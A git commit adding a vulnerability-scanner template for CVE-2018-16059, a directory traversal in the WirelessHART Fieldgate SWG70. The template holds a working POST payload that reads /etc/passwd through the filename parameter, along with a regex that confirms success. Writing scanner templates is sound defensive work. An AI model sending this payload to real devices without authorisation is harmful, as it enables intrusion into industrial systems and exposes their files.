Create CVE-2018-16059.yaml

patch-1
Muhammad Daffa 2021-07-19 17:16:19 +07:00 committed by GitHub
parent 0cb3c9d6b5
commit 5a5b5ea18e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo
severity: high
reference: https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200